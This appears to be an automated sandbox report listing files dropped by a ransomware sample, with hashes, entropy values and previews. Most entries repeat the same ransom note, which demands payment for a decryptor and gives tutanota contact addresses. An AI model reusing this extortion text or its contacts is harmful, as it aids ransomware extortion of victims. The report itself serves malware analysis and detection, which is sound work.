                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):292
                                                                                                                                            Entropy (8bit):7.115663629728326
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:OCGt1Vm3bB/vdb5wQHlgxUChBtHSFF5v3yBXum0vX+IwvxDNGdborlp+Biu3pmQv:15jNg1Jcv+VHTtHWd5mrVRC7fO+Hn
                                                                                                                                            MD5:BCB49DE9DBE3653ED11E5C4F604D58C9
                                                                                                                                            SHA1:1524C46411A8A129DDC709461F06C821F1E9802F
                                                                                                                                            SHA-256:FED44DF474C0F4FDBB9DF6A774FE93DD2495C3BED067EEE2DF7A21590BB300F8
                                                                                                                                            SHA-512:1A17DAD6D8891D604ECA402A798941B70376453B7A5F9949647656C3F16041AB8BC46BC131A850C6358AB9B7E9FAC35265159866BD24BDD99DD2DC03CB2A57B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..K.....o..].Z...........Z.r...>G...O....jFGm*....J..G.n..).XM.=...j....$.....3..7.,. ..7..q..Y..`:H.A~7..UK/.l.. h....C..^e..%3....?..?.u.._....Gt...2.....P_....M..*>K.....y#ZA.D.1b..2.-**...c..Y.m....}."M.....f...t[...TE...*...U..Xd...".<.'...G.4.?X..]...b.(.YFCw#<..m<0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):290
                                                                                                                                            Entropy (8bit):7.267124984781476
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:YvGx2uPXk/E/g3nP+YHRm9gNFAS8M++47mXKWJk8Ue3GKjS4tAY75Vwn:iGwmk/fXWYHQSN58/1UKOk+3GN4b9Vwn
                                                                                                                                            MD5:4F343C14CB2F9F1187E3F4AED9C39C69
                                                                                                                                            SHA1:EE96027E970C58CD04B1263A6DD2618E576C9075
                                                                                                                                            SHA-256:7AC0C059806588AFDC1DEA56EB034C053E4EC0945D6C69E25391E19FA3464760
                                                                                                                                            SHA-512:0596B2C94C6E2D3454E2945A276EAEE1BF43E3FA1F9420EF264A8BB70B7101BA76F78EF27B08CA0ACEF2BF3A7EAA650D43075CDB3692CC2AE7DCE54FE7DF1A97
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:M....``.y..w.V.}.......f..<.)+..,$.._E..........y...DLkj..i.2...=....B..>,.<cu.Eo=.M./.....t-.Yv."..B../$.aP..i.*i.._vRZ..C([.@.........x.`.7}.H...._...../..r.<W...\."L...[=..Zp2....s).&.c.|.p..G.Y...-....e.C..;.?m.n.../.#..P.[.v.9...X.-!\^$.B.T...{l..]....}.S[ob0xABADCABA
